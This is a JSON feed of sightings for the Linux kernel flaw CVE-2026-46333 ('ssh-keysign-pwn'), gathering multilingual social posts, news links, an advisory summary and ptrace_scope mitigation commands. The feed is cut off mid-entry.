{"vulnerability": "cve-2026-4633", "sightings": [{"uuid": "1dfc602e-fbdf-4bcc-81c2-316ffd0d316c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-4633", "type": "seen", "source": "https://access.redhat.com/security/cve/cve-2026-4628", "content": "", "creation_timestamp": "2026-03-24T03:00:03.000000Z"}, {"uuid": "6725e3f4-aec1-428b-88a2-c918c078f1d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/etguenni.bsky.social/post/3mlxnzg2ibk2u", "content": "Neue Linux Kernel Schwachstelle ssh-keysign-pwn (CVE-2026-46333)\n\nborncity.com/blog/2026/05...", "creation_timestamp": "2026-05-16T10:43:04.888495Z"}, {"uuid": "c781c1c5-3765-495b-8fd9-136641687da1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-4633", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mhq3ir4rw52u", "content": "", "creation_timestamp": "2026-03-23T12:42:18.344851Z"}, {"uuid": "04120479-21b4-4220-85cb-469378b5a158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/kiltedtux.bsky.social/post/3mlvh6iykyw2l", "content": "LWN: Seven new stable kernels with patches for CVE-2026-46333\nhttps://lwn.net/Articles/1073060/\n#linux #opensource #tech", "creation_timestamp": "2026-05-15T13:35:24.337253Z"}, {"uuid": "d3e8a9dc-d8bc-4c69-a113-f8cf603b6160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/aprosdoketon.bsky.social/post/3mlwg3l5gac2r", "content": "CVE-2026-46333", "creation_timestamp": "2026-05-15T22:48:31.311161Z"}, {"uuid": "2d39b550-98ac-4f8a-8de7-55b369872aa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/fujiwara.bsky.social/post/3mlwhl3ciuj26", "content": "\"ssh-keysign-pwn (CVE-2026-46333): Patched kernels available in testing\"", "creation_timestamp": "2026-05-15T23:16:39.816231Z"}, {"uuid": "0bf2720b-59bb-451f-a6dc-a844fa660af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/siyeonized.bsky.social/post/3mlyui2k5ek2z", "content": "voy a ver si ma\u00f1ana me pongo a intentar explotar la CVE-2026-46333 o  CVE-2026-31431 que parec\u00eda sencilla para m\u00ed TFM", "creation_timestamp": "2026-05-16T22:11:23.020959Z"}, {"uuid": "ddb46cd6-0e45-4370-80b5-a91aa8c7e807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-46333", "type": "seen", "source": "https://social.tchncs.de/users/gborn/statuses/116583837638116996", "content": "Neue Linux Kernel Schwachstelle ssh-keysign-pwn (CVE-2026-46333)\nhttps://borncity.com/blog/2026/05/16/linux-schwachstelle-ssh-keysign-pwn-cve-2026-46333-ermoeglicht-fremdzugriff-auf-dateien/", "creation_timestamp": "2026-05-16T10:43:07.372079Z"}, {"uuid": "8c8f3434-353f-44e6-b117-ef77bf26cd78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/ostechnix.bsky.social/post/3mm4qjgkvbk23", "content": "Linux Kernel 7.0.8 is released with patches to fix the ssh-keysign-pwn (CVE-2026-46333) root exploit flaw. Update your Linux system today.\n\nMore details here: ostechnix.com/linux-kernel... \n\n#Linux #Kernel708 #ssh_keysign_pwn #CVE_2026_46333 #Rootexploit #Security #Kernelpatch", "creation_timestamp": "2026-05-18T11:11:19.137729Z"}, {"uuid": "95d472ec-2f6c-4edf-98ce-e1e9a92bdd31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sn0.bsky.social/post/3mlz5blqdgkk2", "content": "\u3046\u30fc\u3093\u2026Linux\u306e\u5b89\u5168\u795e\u8a71\u3092\u6839\u62e0\u306b\u4f7f\u3046\u306e\u3082\u96e3\u3057\u304f\u306a\u3063\u3066\u304f\u308b\u308f\u306d\nssh-keysign-pwn (CVE-2026-46333)", "creation_timestamp": "2026-05-17T00:51:20.412189Z"}, {"uuid": "a8ca22b2-3413-42b8-8496-5d7c7b03d15c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlzcx6mem62h", "content": "Top 3 CVE for last 7 days:\nCVE-2026-42511: 56 interactions\nCVE-2026-46300: 56 interactions\nCVE-2026-42897: 51 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-45062: 11 interactions\nCVE-2020-17103: 8 interactions\nCVE-2026-46333: 5 interactions\n", "creation_timestamp": "2026-05-17T02:41:52.018844Z"}, {"uuid": "967cefb2-606d-4767-b511-22fe23e5c637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/mjKYtwBGh-p48w8zvyK_dmOaa4JWuY9k0ugNTHKD_EJnGeA", "content": "", "creation_timestamp": "2026-05-16T07:00:12.000000Z"}, {"uuid": "c67f3342-739e-489c-9bc4-9b6fc9096389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/qFnncewX_FdOxDivGoEqJX19AvA6N2dSwzORt9UZIQWFUQU", "content": "", "creation_timestamp": "2026-05-17T02:07:47.000000Z"}, {"uuid": "77d64444-0938-494a-8426-d059bfd9c3a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/0LL51wE7H3pCot1BGYY3QqExSd1a0DM520erihe1hgvov-s", "content": "", "creation_timestamp": "2026-05-17T09:00:05.000000Z"}, {"uuid": "40a2872c-80b2-4b13-ad82-4c6ef547a167", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/84533", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a public-passwd\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Aurillium\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-17 06:55:55\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nUse CVE-2026-46333 and CVE-2026-31431 to change any user's password.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-17T07:00:04.000000Z"}, {"uuid": "4b65bf78-5827-4eaf-9d39-bc4ebb125864", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/eJ_XuJ4mBNd-lwylDxspegor_v8Aby9HvlFsNuzO9g9tQUM", "content": "", "creation_timestamp": "2026-05-17T11:00:11.000000Z"}, {"uuid": "644f0943-99a5-4579-aa9b-7cfa5f2e0534", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "Telegram/AKvzzPS6cRH5e3-Ghbw0kwesBlioL1QWpK2eWbvMSndUnWE", "content": "", "creation_timestamp": "2026-05-17T15:00:07.000000Z"}, {"uuid": "18098098-86cf-4b2a-aaf8-7709040fcf74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/kravietz.agora.echelon.pl.ap.brid.gy/post/3mlvyzmoz5zp2", "content": "What a week\u2026 #Linux ssh-keysign-pwn (CVE-2026-46333):\n\nMitigation (breaks `strace`, `gdb` etc)\n\n\n    sudo sysctl -w kernel.yama.ptrace_scope=3\n    echo 'kernel.yama.ptrace_scope = 3' | sudo tee /etc/sysctl.d/99-ssh-keysign-pwn.conf\n\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2026-46333", "creation_timestamp": "2026-05-15T18:56:26.542378Z"}, {"uuid": "a71002bf-43ff-4788-a217-862533229b65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mm3wjmfexe22", "content": "Linux Kernel ptrace Exit-race Vulnerability / ssh-keysign-pwn (CVE-2026-46333) \u2014 Mitigation and Kernel Update on CloudLinux Right after the kernel privilege-escalation chain in the XFRM/ESP subsy...\n\n#KernelCare #CVE #Vulnerability #Live #Patching #kernel [\u2026] \n\n[Original post on blog.cloudlinux.com]", "creation_timestamp": "2026-05-18T03:31:41.049044Z"}, {"uuid": "c5e6b651-c152-4f2e-99a7-ecf95b4367cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3173", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u0438 get_dumpable() \u044f\u0434\u0440\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u043c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0432\u043e\u0437\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u043d\u0430 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c, \u0446\u0435\u043b\u043e\u0441\u0442\u043d\u043e\u0441\u0442\u044c \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u043c\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438\n\nBDU:2026-06912\nCVE-2026-46333\n\n\u0412 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0442\u044c\u0441\u044f \"\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c LINUX\", \u0438\u0437\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043c\u0435\u0442\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0435 \u0424\u0421\u0422\u042d\u041a \u0420\u043e\u0441\u0441\u0438\u0438, \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0451\u043d\u043d\u043e\u043c 25 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\n\n\u0414\u043b\u044f Linux:\nhttps://lore.kernel.org/linux-cve-announce/2026051554-CVE-2026-46333-662a@gregkh/\nhttps://git.kernel.org/stable/c/01363cb3fbd0238ffdeb09f53e9039c9edf8a730\nhttps://git.kernel.org/stable/c/15b828a46f305ae9f05a7c16914b3ce273474205\nhttps://git.kernel.org/stable/c/2a93a4fac7b6051d3be7cd1b015fe7320cd0404d\nhttps://git.kernel.org/stable/c/4709234fd1b95136ceb789f639b1e7ea5de1b181\nhttps://git.kernel.org/stable/c/6e5b51e74a40d377bcd3081dd33fbaa0e1aa7e3d\nhttps://git.kernel.org/stable/c/8f907d345bae8f4b3f004c5abc56bf2dfb851ea7\nhttps://git.kernel.org/stable/c/93d4ba49d18e3d7fb41a9927c2d0cca5e9dfefd6\n\n\u0414\u043b\u044f Debian GNU/Linux:\nhttps://security-tracker.debian.org/tracker/CVE-2026-46333\n\n\u0414\u043b\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Red Hat Inc.:\nhttps://access.redhat.com/security/cve/cve-2026-46333", "creation_timestamp": "2026-05-18T14:18:14.000000Z"}, {"uuid": "7237abaf-9ad0-4807-8be9-66a6ba8e4c61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/norviktech.bsky.social/post/3mm5hr3xm5t2n", "content": "La vulnerabilidad CVE-2026-46333 fue divulgada por Qualys el 15 de mayo y se refiere a un error en ptracemayaccess() que puede permitir a los pods de Kubernetes acceder a recursos de manera no autorizada.\n\nhttps://norvik.tech/news/analisis-cve-2026-46333-kubernetes", "creation_timestamp": "2026-05-18T18:07:27.278174Z"}, {"uuid": "5dff88a7-80d7-4338-a021-b1cf14d78e19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/getpacketai.bsky.social/post/3mm5kqfindv2c", "content": "CVE-2026-46333 lets Kubernetes pods steal file descriptors when seccomp is unset or Unconfined\u2014but RuntimeDefault stops it. Critical findings for securing your\u2026\n\nhttps://www.reddit.com/r/kubernetes/comments/1tg1cd8/cve202646333_in_kubernetes_unset_seccomp_let_pods/\n\n#cloud #AWS", "creation_timestamp": "2026-05-18T19:00:23.809991Z"}, {"uuid": "bc7ae384-24e8-4749-9132-aba5caa2595d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://hachyderm.io/users/ChrisShort/statuses/116598433590858492", "content": "AI Discovers CVE-2026-46333 Linux Kernel Vulnerability #devopsish https://linuxstans.com/ai-just-found-another-linux-zero-day-and-security-researchers-are-freaking-out/", "creation_timestamp": "2026-05-19T00:35:04.585846Z"}, {"uuid": "c9f12cfa-5449-496e-9795-b4477d7ec8d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/limura.bsky.social/post/3mmc3zbcskc2s", "content": "\u3075\u3047\u3047 / 2\u4ef6\u306e\u30b3\u30e1\u30f3\u30c8  \u201cLinux Kernel\u306e\u8106\u5f31\u6027(ssh-keygen-pwn: Important: CVE-2026-46333) - SIOS SECURITY BLOG\u201d htn.to/3mugTEWhZD", "creation_timestamp": "2026-05-20T14:20:21.919382Z"}, {"uuid": "8072b07b-bd83-4995-9b3e-766bdce1585e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mmb7g74bycjl", "content": "CVE-2026-46333 (ssh-keysign-pwn) Linux kernel vulnerability mitigations | Ubuntu https://ubuntu.com//blog/ssh-keysign-pwn-linux-vulnerability-fixes-available", "creation_timestamp": "2026-05-20T05:49:07.052677Z"}, {"uuid": "fd2eb857-cddb-4d8d-9f0a-40f00cd95635", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://t.me/ctinow/250600", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path\nhttps://ift.tt/Dl5d2LC", "creation_timestamp": "2026-05-20T15:49:31.000000Z"}, {"uuid": "53e8a97e-062e-44da-9b41-d20b08a7a0f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mmcf64vjjtf2", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Uncategorized #Vulnerabilities #and #Threat #Research [\u2026] \n\n[Original post on blog.qualys.com]", "creation_timestamp": "2026-05-20T17:05:33.200476Z"}, {"uuid": "208ac6d2-754c-4f56-9479-be0fc2b3e72e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mmci6mvhshp2", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-20T17:58:19.606255Z"}, {"uuid": "e38216d0-788e-4738-9815-3e37d59ff74c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/jschauma.mstdn.social.ap.brid.gy/post/3mmcki3g4jrc2", "content": "Qualys has published their full write-up of CVE-2026-46333: https://www.openwall.com/lists/oss-security/2026/05/20/15\n\nThis includes a PoC to full root via `accounts-daemon` demonstrated in Debian 13, Fedora Workstation 43/44, so goes well beyond the initial \"you need a program that opens a [\u2026]", "creation_timestamp": "2026-05-20T18:39:19.243008Z"}, {"uuid": "4f5db1d2-39da-44f2-848f-663561d8e219", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mmclxxaxf22x", "content": "Logic bug in the Linux kernel's __ptrace_may_access() function (CVE-2026-46333)\nDiscussion | lobsters | Author: fro", "creation_timestamp": "2026-05-20T19:05:49.841076Z"}, {"uuid": "84a88285-2a72-478b-8619-3ecb081bc316", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/lobsters-feed.bsky.social/post/3mmcm7j5rbt2p", "content": "Logic bug in the Linux kernel's __ptrace_may_access() function (CVE-2026-46333) https://lobste.rs/s/nwdn3w #security #linux ", "creation_timestamp": "2026-05-20T19:10:03.744503Z"}, {"uuid": "fb0dfd6f-0fc9-4f93-9d4a-0c9cc6eaffa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/cyberkendra.com/post/3mmdky5t32s2v", "content": "\ud83d\udd34 CVE-2026-46333 \u2014 Linux Kernel ptrace Flaw, Full Advisory Released\nQualys today published the complete advisory for a nine-year-old Linux kernel flaw that lets any local unprivileged user.\n\nRead Detail- www.cyberkendra.com/2026/05/nine...\n#linux #security #vulnerability #infosec", "creation_timestamp": "2026-05-21T04:20:50.340207Z"}, {"uuid": "c30fe6c0-5773-4266-8f76-33d5243be68f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/_t5JFSPSOfbQz9kScpjpGdxXGShVNgFAEjUbRg__tg-gk3Q", "content": "", "creation_timestamp": "2026-05-20T07:00:15.000000Z"}, {"uuid": "d6f75376-9703-4512-8749-e6a3c57db5a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://gist.github.com/alon710/9c0d20e9d0fe058b907c7e32ba953536", "content": "# CVE-2026-46333: CVE-2026-46333: Local Information Disclosure in Linux Kernel Process Exit Path\n\n> **CVSS Score:** 7.1\n> **Published:** 2026-05-15\n> **Full Report:** https://cvereports.com/reports/CVE-2026-46333\n\n## Summary\nCVE-2026-46333 is a high-severity race condition in the Linux kernel process management subsystem, specifically involving the get_dumpable() logic during process exit. Local attackers can exploit this timing window to hijack file descriptors belonging to privileged SUID/SGID processes, leading to the disclosure of sensitive files such as SSH private keys and shadow password hashes.\n\n## TL;DR\nA race condition in the Linux kernel process exit sequence allows local unprivileged users to steal open file descriptors from SUID processes. By targeting binaries like ssh-keysign, attackers can read root-owned files such as SSH host keys.\n\n## Exploit Status: WEAPONIZED\n\n## Technical Details\n\n- **Vulnerability Class**: Race Condition (CWE-362)\n- **Attack Vector**: Local (AV:L)\n- **CVSS v3.1 Score**: 7.1 (High)\n- **EPSS Score**: 0.01% (0.44th percentile)\n- **Exploit Status**: Weaponized PoC Available\n- **CISA KEV**: Not Listed\n- **Primary Target**: /usr/lib/openssh/ssh-keysign\n\n## Affected Systems\n\n- Linux Kernel\n- Ubuntu\n- Red Hat Enterprise Linux\n- **Linux Kernel Mainline**: < 7.1-rc4 (Fixed in: `7.1-rc4`)\n- **Linux Kernel Stable (6.18.x)**: < 6.18.31 (Fixed in: `6.18.31`)\n- **Ubuntu Linux**: 14.04 - 26.04 (Fixed in: `TBD`)\n\n## Mitigation\n\n- Upgrade the Linux kernel to a version containing commit 93d4ba49d18e3d7fb41a9927c2d0cca5e9dfefd6.\n- Restrict ptrace access globally using the Yama security module.\n- Monitor audit logs for unexpected pidfd_getfd usage or unprivileged ptrace attempts against SUID binaries.\n\n**Remediation Steps:**\n1. Verify the current kernel version using 'uname -r'.\n2. Apply updates via the distribution package manager (e.g., 'apt upgrade linux-image-generic' or 'dnf update kernel').\n3. Reboot the system to load the patched kernel.\n4. If patching is delayed, execute 'sudo sysctl -w kernel.yama.ptrace_scope=2' as a temporary measure.\n5. Persist the workaround by running 'echo \"kernel.yama.ptrace_scope=2\" | sudo tee /etc/sysctl.d/99-ptrace.conf'.\n\n## References\n\n- [NVD Vulnerability Details](https://nvd.nist.gov/vuln/detail/CVE-2026-46333)\n- [Red Hat Advisory RHSB-2026-004](https://access.redhat.com/security/vulnerabilities/RHSB-2026-004)\n- [Ubuntu Security Blog: ssh-keysign-pwn](https://ubuntu.com/blog/ssh-keysign-pwn-linux-vulnerability-fixes-available)\n\n\n---\n*Generated by [CVEReports](https://cvereports.com/reports/CVE-2026-46333) - Automated Vulnerability Intelligence*", "creation_timestamp": "2026-05-21T04:00:50.000000Z"}, {"uuid": "27eb87f4-9c77-42ce-a0d0-dc500be9cfa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mmdxj4fwrbm2", "content": "9-Year-Old Linux Kernel Flaw Enables Root Command Execution on Major Distros TheHackerNews CVE-2026-46333 is a nine-year Linux kernel improper privilege management flaw introduced in November 2016 ...\n\n#Security #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-21T08:05:05.305824Z"}, {"uuid": "1be51d00-631c-4730-bf96-616f94fc0ead", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sec-news-bot.bsky.social/post/3mmdzpjqzqn23", "content": "Linux \u30ab\u30fc\u30cd\u30eb\u306e9\u5e74\u524d\u306e\u8106\u5f31\u6027\u304c\u7279\u5b9a\u3001\u6839\u6a29\u9650\u596a\u53d6\u306e\u5371\u967a\n\n2016\u5e7411\u6708\u306b\u5c0e\u5165\u3055\u308c\u305f CVE-2026-46333 \u306f\u3001Linux \u30ab\u30fc\u30cd\u30eb\u306e\u6a29\u9650\u7ba1\u7406\u306e\u4e0d\u5099\u306b\u3088\u308a root \u6a29\u9650\u3067\u306e\u4efb\u610f\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u304c\u53ef\u80fd\u3002CVSS \u30b9\u30b3\u30a2 5.5\u3002\u4e3b\u8981 Linux \u30c7\u30a3\u30b9\u30c8\u30ed\u304c\u5f71\u97ff\u3092\u53d7\u3051\u308b\u3002\n\n#CVE #\u8106\u5f31\u6027 #\u60c5\u5831\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3", "creation_timestamp": "2026-05-21T08:44:19.159697Z"}, {"uuid": "00939bd9-db0f-44c2-9b1d-478581b179bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/deafnews-auto.bsky.social/post/3mme3qlv3sl2i", "content": "CVE-2026-46333: Nine-Year-Old Linux Kernel Flaw Enables Root Escalation", "creation_timestamp": "2026-05-21T09:20:43.102156Z"}, {"uuid": "78735610-3538-4bee-b283-c1cc42d15aba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 